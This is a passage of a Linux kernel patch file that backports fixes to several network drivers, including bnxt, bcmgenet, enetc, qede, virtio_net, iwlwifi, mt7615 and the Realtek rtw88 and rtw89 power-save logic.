++				      unsigned int entry, struct udp_tunnel_info *ti)
++{
++	struct bnxt *bp = netdev_priv(netdev);
++	unsigned int cmd;
++
++	if (ti->type == UDP_TUNNEL_TYPE_VXLAN)
++		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_VXLAN;
++	else
++		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_GENEVE;
+ 
+ 	return bnxt_hwrm_tunnel_dst_port_free(bp, cmd);
+ }
+ 
+ static const struct udp_tunnel_nic_info bnxt_udp_tunnels = {
+-	.sync_table	= bnxt_udp_tunnel_sync,
++	.set_port	= bnxt_udp_tunnel_set_port,
++	.unset_port	= bnxt_udp_tunnel_unset_port,
+ 	.flags		= UDP_TUNNEL_NIC_INFO_MAY_SLEEP |
+ 			  UDP_TUNNEL_NIC_INFO_OPEN_ONLY,
+ 	.tables		= {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index b2d531e014c57..89f046ce1373c 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -3727,7 +3727,7 @@ static int bnxt_reset(struct net_device *dev, u32 *flags)
+ 		}
+ 	}
+ 
+-	if (req & BNXT_FW_RESET_AP) {
++	if (!BNXT_CHIP_P4_PLUS(bp) && (req & BNXT_FW_RESET_AP)) {
+ 		/* This feature is not supported in older firmware versions */
+ 		if (bp->hwrm_spec_code >= 0x10803) {
+ 			if (!bnxt_firmware_reset_ap(dev)) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+index 2132ce63193ce..4faaa9a50f4bc 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+@@ -929,6 +929,7 @@ int bnxt_ptp_init(struct bnxt *bp, bool phc_cfg)
+ 	} else {
+ 		bnxt_ptp_timecounter_init(bp, true);
+ 	}
++	bnxt_hwrm_func_drv_rgtr(bp, NULL, 0, true);
+ 
+ 	ptp->ptp_info = bnxt_ptp_caps;
+ 	if ((bp->fw_cap & BNXT_FW_CAP_PTP_PPS)) {
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 4da2becfa950c..1ae082eb9e905 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -1290,7 +1290,8 @@ static void bcmgenet_get_ethtool_stats(struct net_device *dev,
+ 	}
+ }
+ 
+-static void bcmgenet_eee_enable_set(struct net_device *dev, bool enable)
++void bcmgenet_eee_enable_set(struct net_device *dev, bool enable,
++			     bool tx_lpi_enabled)
+ {
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 	u32 off = priv->hw_params->tbuf_offset + TBUF_ENERGY_CTRL;
+@@ -1310,7 +1311,7 @@ static void bcmgenet_eee_enable_set(struct net_device *dev, bool enable)
+ 
+ 	/* Enable EEE and switch to a 27Mhz clock automatically */
+ 	reg = bcmgenet_readl(priv->base + off);
+-	if (enable)
++	if (tx_lpi_enabled)
+ 		reg |= TBUF_EEE_EN | TBUF_PM_EN;
+ 	else
+ 		reg &= ~(TBUF_EEE_EN | TBUF_PM_EN);
+@@ -1331,6 +1332,7 @@ static void bcmgenet_eee_enable_set(struct net_device *dev, bool enable)
+ 
+ 	priv->eee.eee_enabled = enable;
+ 	priv->eee.eee_active = enable;
++	priv->eee.tx_lpi_enabled = tx_lpi_enabled;
+ }
+ 
+ static int bcmgenet_get_eee(struct net_device *dev, struct ethtool_eee *e)
+@@ -1346,6 +1348,7 @@ static int bcmgenet_get_eee(struct net_device *dev, struct ethtool_eee *e)
+ 
+ 	e->eee_enabled = p->eee_enabled;
+ 	e->eee_active = p->eee_active;
++	e->tx_lpi_enabled = p->tx_lpi_enabled;
+ 	e->tx_lpi_timer = bcmgenet_umac_readl(priv, UMAC_EEE_LPI_TIMER);
+ 
+ 	return phy_ethtool_get_eee(dev->phydev, e);
+@@ -1355,7 +1358,6 @@ static int bcmgenet_set_eee(struct net_device *dev, struct ethtool_eee *e)
+ {
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 	struct ethtool_eee *p = &priv->eee;
+-	int ret = 0;
+ 
+ 	if (GENET_IS_V1(priv))
+ 		return -EOPNOTSUPP;
+@@ -1366,16 +1368,11 @@ static int bcmgenet_set_eee(struct net_device *dev, struct ethtool_eee *e)
+ 	p->eee_enabled = e->eee_enabled;
+ 
+ 	if (!p->eee_enabled) {
+-		bcmgenet_eee_enable_set(dev, false);
++		bcmgenet_eee_enable_set(dev, false, false);
+ 	} else {
+-		ret = phy_init_eee(dev->phydev, false);
+-		if (ret) {
+-			netif_err(priv, hw, dev, "EEE initialization failed\n");
+-			return ret;
+-		}
+-
++		p->eee_active = phy_init_eee(dev->phydev, false) >= 0;
+ 		bcmgenet_umac_writel(priv, e->tx_lpi_timer, UMAC_EEE_LPI_TIMER);
+-		bcmgenet_eee_enable_set(dev, true);
++		bcmgenet_eee_enable_set(dev, p->eee_active, e->tx_lpi_enabled);
+ 	}
+ 
+ 	return phy_ethtool_set_eee(dev->phydev, e);
+@@ -4274,9 +4271,6 @@ static int bcmgenet_resume(struct device *d)
+ 	if (!device_may_wakeup(d))
+ 		phy_resume(dev->phydev);
+ 
+-	if (priv->eee.eee_enabled)
+-		bcmgenet_eee_enable_set(dev, true);
+-
+ 	bcmgenet_netif_start(dev);
+ 
+ 	netif_device_attach(dev);
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.h b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+index 946f6e283c4e6..1985c0ec4da2a 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.h
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+@@ -703,4 +703,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ void bcmgenet_wol_power_up_cfg(struct bcmgenet_priv *priv,
+ 			       enum bcmgenet_power_mode mode);
+ 
++void bcmgenet_eee_enable_set(struct net_device *dev, bool enable,
++			     bool tx_lpi_enabled);
++
+ #endif /* __BCMGENET_H__ */
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index ded0e64a9f6a1..bf9e246784b6e 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -88,6 +88,11 @@ static void bcmgenet_mac_config(struct net_device *dev)
+ 		reg |= CMD_TX_EN | CMD_RX_EN;
+ 	}
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++
++	priv->eee.eee_active = phy_init_eee(phydev, 0) >= 0;
++	bcmgenet_eee_enable_set(dev,
++				priv->eee.eee_enabled && priv->eee.eee_active,
++				priv->eee.tx_lpi_enabled);
+ }
+ 
+ /* setup netdev link state when PHY link status change and
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc.c b/drivers/net/ethernet/freescale/enetc/enetc.c
+index e96449eedfb54..25c303406e6b4 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc.c
+@@ -1209,7 +1209,13 @@ static int enetc_clean_rx_ring(struct enetc_bdr *rx_ring,
+ 		if (!skb)
+ 			break;
+ 
+-		rx_byte_cnt += skb->len;
++		/* When set, the outer VLAN header is extracted and reported
++		 * in the receive buffer descriptor. So rx_byte_cnt should
++		 * add the length of the extracted VLAN header.
++		 */
++		if (bd_status & ENETC_RXBD_FLAG_VLAN)
++			rx_byte_cnt += VLAN_HLEN;
++		rx_byte_cnt += skb->len + ETH_HLEN;
+ 		rx_frm_cnt++;
+ 
+ 		napi_gro_receive(napi, skb);
+@@ -1532,6 +1538,14 @@ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 		enetc_build_xdp_buff(rx_ring, bd_status, &rxbd, &i,
+ 				     &cleaned_cnt, &xdp_buff);
+ 
++		/* When set, the outer VLAN header is extracted and reported
++		 * in the receive buffer descriptor. So rx_byte_cnt should
++		 * add the length of the extracted VLAN header.
++		 */
++		if (bd_status & ENETC_RXBD_FLAG_VLAN)
++			rx_byte_cnt += VLAN_HLEN;
++		rx_byte_cnt += xdp_get_buff_len(&xdp_buff);
++
+ 		xdp_act = bpf_prog_run_xdp(prog, &xdp_buff);
+ 
+ 		switch (xdp_act) {
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_l2.c b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+index 2edd6bf64a3cc..7776d3bdd459a 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_l2.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+@@ -1903,7 +1903,7 @@ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats)
+ {
+ 	u32 i;
+ 
+-	if (!cdev) {
++	if (!cdev || cdev->recov_in_prog) {
+ 		memset(stats, 0, sizeof(*stats));
+ 		return;
+ 	}
+diff --git a/drivers/net/ethernet/qlogic/qede/qede.h b/drivers/net/ethernet/qlogic/qede/qede.h
+index f90dcfe9ee688..8a63f99d499c4 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede.h
++++ b/drivers/net/ethernet/qlogic/qede/qede.h
+@@ -271,6 +271,10 @@ struct qede_dev {
+ #define QEDE_ERR_WARN			3
+ 
+ 	struct qede_dump_info		dump_info;
++	struct delayed_work		periodic_task;
++	unsigned long			stats_coal_ticks;
++	u32				stats_coal_usecs;
++	spinlock_t			stats_lock; /* lock for vport stats access */
+ };
+ 
+ enum QEDE_STATE {
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_ethtool.c b/drivers/net/ethernet/qlogic/qede/qede_ethtool.c
+index 8034d812d5a00..d0a3395b2bc1f 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_ethtool.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_ethtool.c
+@@ -430,6 +430,8 @@ static void qede_get_ethtool_stats(struct net_device *dev,
+ 		}
+ 	}
+ 
++	spin_lock(&edev->stats_lock);
++
+ 	for (i = 0; i < QEDE_NUM_STATS; i++) {
+ 		if (qede_is_irrelevant_stat(edev, i))
+ 			continue;
+@@ -439,6 +441,8 @@ static void qede_get_ethtool_stats(struct net_device *dev,
+ 		buf++;
+ 	}
+ 
++	spin_unlock(&edev->stats_lock);
++
+ 	__qede_unlock(edev);
+ }
+ 
+@@ -830,6 +834,7 @@ out:
+ 
+ 	coal->rx_coalesce_usecs = rx_coal;
+ 	coal->tx_coalesce_usecs = tx_coal;
++	coal->stats_block_coalesce_usecs = edev->stats_coal_usecs;
+ 
+ 	return rc;
+ }
+@@ -843,6 +848,19 @@ int qede_set_coalesce(struct net_device *dev, struct ethtool_coalesce *coal,
+ 	int i, rc = 0;
+ 	u16 rxc, txc;
+ 
++	if (edev->stats_coal_usecs != coal->stats_block_coalesce_usecs) {
++		edev->stats_coal_usecs = coal->stats_block_coalesce_usecs;
++		if (edev->stats_coal_usecs) {
++			edev->stats_coal_ticks = usecs_to_jiffies(edev->stats_coal_usecs);
++			schedule_delayed_work(&edev->periodic_task, 0);
++
++			DP_INFO(edev, "Configured stats coal ticks=%lu jiffies\n",
++				edev->stats_coal_ticks);
++		} else {
++			cancel_delayed_work_sync(&edev->periodic_task);
++		}
++	}
++
+ 	if (!netif_running(dev)) {
+ 		DP_INFO(edev, "Interface is down\n");
+ 		return -EINVAL;
+@@ -2253,7 +2271,8 @@ out:
+ }
+ 
+ static const struct ethtool_ops qede_ethtool_ops = {
+-	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS,
++	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS |
++					  ETHTOOL_COALESCE_STATS_BLOCK_USECS,
+ 	.get_link_ksettings		= qede_get_link_ksettings,
+ 	.set_link_ksettings		= qede_set_link_ksettings,
+ 	.get_drvinfo			= qede_get_drvinfo,
+@@ -2304,7 +2323,8 @@ static const struct ethtool_ops qede_ethtool_ops = {
+ };
+ 
+ static const struct ethtool_ops qede_vf_ethtool_ops = {
+-	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS,
++	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS |
++					  ETHTOOL_COALESCE_STATS_BLOCK_USECS,
+ 	.get_link_ksettings		= qede_get_link_ksettings,
+ 	.get_drvinfo			= qede_get_drvinfo,
+ 	.get_msglevel			= qede_get_msglevel,
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index 89d64a5a4951a..e8d427c7d1cff 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -308,6 +308,8 @@ void qede_fill_by_demand_stats(struct qede_dev *edev)
+ 
+ 	edev->ops->get_vport_stats(edev->cdev, &stats);
+ 
++	spin_lock(&edev->stats_lock);
++
+ 	p_common->no_buff_discards = stats.common.no_buff_discards;
+ 	p_common->packet_too_big_discard = stats.common.packet_too_big_discard;
+ 	p_common->ttl0_discard = stats.common.ttl0_discard;
+@@ -405,6 +407,8 @@ void qede_fill_by_demand_stats(struct qede_dev *edev)
+ 		p_ah->tx_1519_to_max_byte_packets =
+ 		    stats.ah.tx_1519_to_max_byte_packets;
+ 	}
++
++	spin_unlock(&edev->stats_lock);
+ }
+ 
+ static void qede_get_stats64(struct net_device *dev,
+@@ -413,9 +417,10 @@ static void qede_get_stats64(struct net_device *dev,
+ 	struct qede_dev *edev = netdev_priv(dev);
+ 	struct qede_stats_common *p_common;
+ 
+-	qede_fill_by_demand_stats(edev);
+ 	p_common = &edev->stats.common;
+ 
++	spin_lock(&edev->stats_lock);
++
+ 	stats->rx_packets = p_common->rx_ucast_pkts + p_common->rx_mcast_pkts +
+ 			    p_common->rx_bcast_pkts;
+ 	stats->tx_packets = p_common->tx_ucast_pkts + p_common->tx_mcast_pkts +
+@@ -435,6 +440,8 @@ static void qede_get_stats64(struct net_device *dev,
+ 		stats->collisions = edev->stats.bb.tx_total_collisions;
+ 	stats->rx_crc_errors = p_common->rx_crc_errors;
+ 	stats->rx_frame_errors = p_common->rx_align_errors;
++
++	spin_unlock(&edev->stats_lock);
+ }
+ 
+ #ifdef CONFIG_QED_SRIOV
+@@ -1061,6 +1068,23 @@ static void qede_unlock(struct qede_dev *edev)
+ 	rtnl_unlock();
+ }
+ 
++static void qede_periodic_task(struct work_struct *work)
++{
++	struct qede_dev *edev = container_of(work, struct qede_dev,
++					     periodic_task.work);
++
++	qede_fill_by_demand_stats(edev);
++	schedule_delayed_work(&edev->periodic_task, edev->stats_coal_ticks);
++}
++
++static void qede_init_periodic_task(struct qede_dev *edev)
++{
++	INIT_DELAYED_WORK(&edev->periodic_task, qede_periodic_task);
++	spin_lock_init(&edev->stats_lock);
++	edev->stats_coal_usecs = USEC_PER_SEC;
++	edev->stats_coal_ticks = usecs_to_jiffies(USEC_PER_SEC);
++}
++
+ static void qede_sp_task(struct work_struct *work)
+ {
+ 	struct qede_dev *edev = container_of(work, struct qede_dev,
+@@ -1080,6 +1104,7 @@ static void qede_sp_task(struct work_struct *work)
+ 	 */
+ 
+ 	if (test_and_clear_bit(QEDE_SP_RECOVERY, &edev->sp_flags)) {
++		cancel_delayed_work_sync(&edev->periodic_task);
+ #ifdef CONFIG_QED_SRIOV
+ 		/* SRIOV must be disabled outside the lock to avoid a deadlock.
+ 		 * The recovery of the active VFs is currently not supported.
+@@ -1270,6 +1295,7 @@ static int __qede_probe(struct pci_dev *pdev, u32 dp_module, u8 dp_level,
+ 		 */
+ 		INIT_DELAYED_WORK(&edev->sp_task, qede_sp_task);
+ 		mutex_init(&edev->qede_lock);
++		qede_init_periodic_task(edev);
+ 
+ 		rc = register_netdev(edev->ndev);
+ 		if (rc) {
+@@ -1294,6 +1320,11 @@ static int __qede_probe(struct pci_dev *pdev, u32 dp_module, u8 dp_level,
+ 	edev->rx_copybreak = QEDE_RX_HDR_SIZE;
+ 
+ 	qede_log_probe(edev);
++
++	/* retain user config (for example - after recovery) */
++	if (edev->stats_coal_usecs)
++		schedule_delayed_work(&edev->periodic_task, 0);
++
+ 	return 0;
+ 
+ err4:
+@@ -1362,6 +1393,7 @@ static void __qede_remove(struct pci_dev *pdev, enum qede_remove_mode mode)
+ 		unregister_netdev(ndev);
+ 
+ 		cancel_delayed_work_sync(&edev->sp_task);
++		cancel_delayed_work_sync(&edev->periodic_task);
+ 
+ 		edev->ops->common->set_power_state(cdev, PCI_D0);
+ 
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 766f86bdc4a09..9b1403291d921 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -2199,6 +2199,11 @@ static void sfp_sm_module(struct sfp *sfp, unsigned int event)
+ 			break;
+ 		}
+ 
++		/* Force a poll to re-read the hardware signal state after
++		 * sfp_sm_mod_probe() changed state_hw_mask.
++		 */
++		mod_delayed_work(system_wq, &sfp->poll, 1);
++
+ 		err = sfp_hwmon_insert(sfp);
+ 		if (err)
+ 			dev_warn(sfp->dev, "hwmon probe failed: %pe\n",
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 47788f0935514..fae302c5b0a91 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -200,6 +200,8 @@ struct control_buf {
+ 	__virtio16 vid;
+ 	__virtio64 offloads;
+ 	struct virtio_net_ctrl_rss rss;
++	struct virtio_net_ctrl_coal_tx coal_tx;
++	struct virtio_net_ctrl_coal_rx coal_rx;
+ };
+ 
+ struct virtnet_info {
+@@ -2786,12 +2788,10 @@ static int virtnet_send_notf_coal_cmds(struct virtnet_info *vi,
+ 				       struct ethtool_coalesce *ec)
+ {
+ 	struct scatterlist sgs_tx, sgs_rx;
+-	struct virtio_net_ctrl_coal_tx coal_tx;
+-	struct virtio_net_ctrl_coal_rx coal_rx;
+ 
+-	coal_tx.tx_usecs = cpu_to_le32(ec->tx_coalesce_usecs);
+-	coal_tx.tx_max_packets = cpu_to_le32(ec->tx_max_coalesced_frames);
+-	sg_init_one(&sgs_tx, &coal_tx, sizeof(coal_tx));
++	vi->ctrl->coal_tx.tx_usecs = cpu_to_le32(ec->tx_coalesce_usecs);
++	vi->ctrl->coal_tx.tx_max_packets = cpu_to_le32(ec->tx_max_coalesced_frames);
++	sg_init_one(&sgs_tx, &vi->ctrl->coal_tx, sizeof(vi->ctrl->coal_tx));
+ 
+ 	if (!virtnet_send_command(vi, VIRTIO_NET_CTRL_NOTF_COAL,
+ 				  VIRTIO_NET_CTRL_NOTF_COAL_TX_SET,
+@@ -2802,9 +2802,9 @@ static int virtnet_send_notf_coal_cmds(struct virtnet_info *vi,
+ 	vi->tx_usecs = ec->tx_coalesce_usecs;
+ 	vi->tx_max_packets = ec->tx_max_coalesced_frames;
+ 
+-	coal_rx.rx_usecs = cpu_to_le32(ec->rx_coalesce_usecs);
+-	coal_rx.rx_max_packets = cpu_to_le32(ec->rx_max_coalesced_frames);
+-	sg_init_one(&sgs_rx, &coal_rx, sizeof(coal_rx));
++	vi->ctrl->coal_rx.rx_usecs = cpu_to_le32(ec->rx_coalesce_usecs);
++	vi->ctrl->coal_rx.rx_max_packets = cpu_to_le32(ec->rx_max_coalesced_frames);
++	sg_init_one(&sgs_rx, &vi->ctrl->coal_rx, sizeof(vi->ctrl->coal_rx));
+ 
+ 	if (!virtnet_send_command(vi, VIRTIO_NET_CTRL_NOTF_COAL,
+ 				  VIRTIO_NET_CTRL_NOTF_COAL_RX_SET,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index c876e81437fee..2748459d12279 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -2724,17 +2724,13 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 		if (wowlan_info_ver < 2) {
+ 			struct iwl_wowlan_info_notif_v1 *notif_v1 = (void *)pkt->data;
+ 
+-			notif = kmemdup(notif_v1,
+-					offsetofend(struct iwl_wowlan_info_notif,
+-						    received_beacons),
+-					GFP_ATOMIC);
+-
++			notif = kmemdup(notif_v1, sizeof(*notif), GFP_ATOMIC);
+ 			if (!notif)
+ 				return false;
+ 
+ 			notif->tid_tear_down = notif_v1->tid_tear_down;
+ 			notif->station_id = notif_v1->station_id;
+-
++			memset_after(notif, 0, station_id);
+ 		} else {
+ 			notif = (void *)pkt->data;
+ 		}
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index faed43b11ec93..40c80d09d108a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -921,7 +921,10 @@ void mt7615_mac_sta_poll(struct mt7615_dev *dev)
+ 
+ 		msta = list_first_entry(&sta_poll_list, struct mt7615_sta,
+ 					poll_list);
++
++		spin_lock_bh(&dev->sta_poll_lock);
+ 		list_del_init(&msta->poll_list);
++		spin_unlock_bh(&dev->sta_poll_lock);
+ 
+ 		addr = mt7615_mac_wtbl_addr(dev, msta->wcid.idx) + 19 * 4;
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index 62fb28f14c94d..fabca307867a0 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -88,15 +88,6 @@ static int rtw_ops_config(struct ieee80211_hw *hw, u32 changed)
+ 		}
+ 	}
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_PS) {
+-		if (hw->conf.flags & IEEE80211_CONF_PS) {
+-			rtwdev->ps_enabled = true;
+-		} else {
+-			rtwdev->ps_enabled = false;
+-			rtw_leave_lps(rtwdev);
+-		}
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL)
+ 		rtw_set_channel(rtwdev);
+ 
+@@ -206,6 +197,7 @@ static int rtw_ops_add_interface(struct ieee80211_hw *hw,
+ 	rtwvif->bcn_ctrl = bcn_ctrl;
+ 	config |= PORT_SET_BCN_CTRL;
+ 	rtw_vif_port_config(rtwdev, rtwvif, config);
++	rtw_recalc_lps(rtwdev, vif);
+ 
+ 	mutex_unlock(&rtwdev->mutex);
+ 
+@@ -236,6 +228,7 @@ static void rtw_ops_remove_interface(struct ieee80211_hw *hw,
+ 	rtwvif->bcn_ctrl = 0;
+ 	config |= PORT_SET_BCN_CTRL;
+ 	rtw_vif_port_config(rtwdev, rtwvif, config);
++	rtw_recalc_lps(rtwdev, NULL);
+ 
+ 	mutex_unlock(&rtwdev->mutex);
+ }
+@@ -428,6 +421,9 @@ static void rtw_ops_bss_info_changed(struct ieee80211_hw *hw,
+ 	if (changed & BSS_CHANGED_ERP_SLOT)
+ 		rtw_conf_tx(rtwdev, rtwvif);
+ 
++	if (changed & BSS_CHANGED_PS)
++		rtw_recalc_lps(rtwdev, NULL);
++
+ 	rtw_vif_port_config(rtwdev, rtwvif, config);
+ 
+ 	mutex_unlock(&rtwdev->mutex);
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 8080ace5ed51e..4c8164db4a9e4 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -248,8 +248,8 @@ static void rtw_watch_dog_work(struct work_struct *work)
+ 	 * more than two stations associated to the AP, then we can not enter
+ 	 * lps, because fw does not handle the overlapped beacon interval
+ 	 *
+-	 * mac80211 should iterate vifs and determine if driver can enter
+-	 * ps by passing IEEE80211_CONF_PS to us, all we need to do is to
++	 * rtw_recalc_lps() iterate vifs and determine if driver can enter
++	 * ps by vif->type and vif->cfg.ps, all we need to do here is to
+ 	 * get that vif and check if device is having traffic more than the
+ 	 * threshold.
+ 	 */
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.c b/drivers/net/wireless/realtek/rtw88/ps.c
+index dc0d852182454..7ac35c368d7a5 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.c
++++ b/drivers/net/wireless/realtek/rtw88/ps.c
+@@ -299,3 +299,46 @@ void rtw_leave_lps_deep(struct rtw_dev *rtwdev)
+ 
+ 	__rtw_leave_lps_deep(rtwdev);
+ }
++
++struct rtw_vif_recalc_lps_iter_data {
++	struct rtw_dev *rtwdev;
++	struct ieee80211_vif *found_vif;
++	int count;
++};
++
++static void __rtw_vif_recalc_lps(struct rtw_vif_recalc_lps_iter_data *data,
++				 struct ieee80211_vif *vif)
++{
++	if (data->count < 0)
++		return;
++
++	if (vif->type != NL80211_IFTYPE_STATION) {
++		data->count = -1;
++		return;
++	}
++
++	data->count++;
++	data->found_vif = vif;
++}
++
++static void rtw_vif_recalc_lps_iter(void *data, u8 *mac,
++				    struct ieee80211_vif *vif)
++{
++	__rtw_vif_recalc_lps(data, vif);
++}
++
++void rtw_recalc_lps(struct rtw_dev *rtwdev, struct ieee80211_vif *new_vif)
++{
++	struct rtw_vif_recalc_lps_iter_data data = { .rtwdev = rtwdev };
++
++	if (new_vif)
++		__rtw_vif_recalc_lps(&data, new_vif);
++	rtw_iterate_vifs(rtwdev, rtw_vif_recalc_lps_iter, &data);
++
++	if (data.count == 1 && data.found_vif->cfg.ps) {
++		rtwdev->ps_enabled = true;
++	} else {
++		rtwdev->ps_enabled = false;
++		rtw_leave_lps(rtwdev);
++	}
++}
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.h b/drivers/net/wireless/realtek/rtw88/ps.h
+index c194386f6db53..5ae83d2526cfd 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.h
++++ b/drivers/net/wireless/realtek/rtw88/ps.h
+@@ -23,4 +23,6 @@ void rtw_enter_lps(struct rtw_dev *rtwdev, u8 port_id);
+ void rtw_leave_lps(struct rtw_dev *rtwdev);
+ void rtw_leave_lps_deep(struct rtw_dev *rtwdev);
+ enum rtw_lps_deep_mode rtw_get_lps_deep_mode(struct rtw_dev *rtwdev);
++void rtw_recalc_lps(struct rtw_dev *rtwdev, struct ieee80211_vif *new_vif);
++
+ #endif
+diff --git a/drivers/net/wireless/realtek/rtw89/mac80211.c b/drivers/net/wireless/realtek/rtw89/mac80211.c
+index a296bfa8188f2..a8f478f0cde90 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw89/mac80211.c
+@@ -78,15 +78,6 @@ static int rtw89_ops_config(struct ieee80211_hw *hw, u32 changed)
+ 	    !(hw->conf.flags & IEEE80211_CONF_IDLE))
+ 		rtw89_leave_ips(rtwdev);
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_PS) {
+-		if (hw->conf.flags & IEEE80211_CONF_PS) {
+-			rtwdev->lps_enabled = true;
+-		} else {
+-			rtw89_leave_lps(rtwdev);
+-			rtwdev->lps_enabled = false;
+-		}
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL) {
+ 		rtw89_config_entity_chandef(rtwdev, RTW89_SUB_ENTITY_0,
+ 					    &hw->conf.chandef);
+@@ -142,6 +133,8 @@ static int rtw89_ops_add_interface(struct ieee80211_hw *hw,
+ 	rtw89_core_txq_init(rtwdev, vif->txq);
+ 
+ 	rtw89_btc_ntfy_role_info(rtwdev, rtwvif, NULL, BTC_ROLE_START);
++
++	rtw89_recalc_lps(rtwdev);
+ out:
+ 	mutex_unlock(&rtwdev->mutex);
+ 
+@@ -165,6 +158,8 @@ static void rtw89_ops_remove_interface(struct ieee80211_hw *hw,
+ 	rtw89_mac_remove_vif(rtwdev, rtwvif);
+ 	rtw89_core_release_bit_map(rtwdev->hw_port, rtwvif->port);
+ 	list_del_init(&rtwvif->list);
++	rtw89_recalc_lps(rtwdev);
++
+ 	mutex_unlock(&rtwdev->mutex);
+ }
+ 
+@@ -411,6 +406,9 @@ static void rtw89_ops_bss_info_changed(struct ieee80211_hw *hw,
+ 	if (changed & BSS_CHANGED_P2P_PS)
+ 		rtw89_process_p2p_ps(rtwdev, vif);
+ 
++	if (changed & BSS_CHANGED_PS)
++		rtw89_recalc_lps(rtwdev);
++
+ 	mutex_unlock(&rtwdev->mutex);
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/ps.c b/drivers/net/wireless/realtek/rtw89/ps.c
+index bf41a11416792..7cf9f80c7a93c 100644
+--- a/drivers/net/wireless/realtek/rtw89/ps.c
++++ b/drivers/net/wireless/realtek/rtw89/ps.c
+@@ -244,3 +244,29 @@ void rtw89_process_p2p_ps(struct rtw89_dev *rtwdev, struct ieee80211_vif *vif)
+ 	rtw89_p2p_disable_all_noa(rtwdev, vif);
+ 	rtw89_p2p_update_noa(rtwdev, vif);
+ }
++
++void rtw89_recalc_lps(struct rtw89_dev *rtwdev)
++{
++	struct ieee80211_vif *vif, *found_vif = NULL;
++	struct rtw89_vif *rtwvif;
++	int count = 0;
++
++	rtw89_for_each_rtwvif(rtwdev, rtwvif) {
++		vif = rtwvif_to_vif(rtwvif);
++
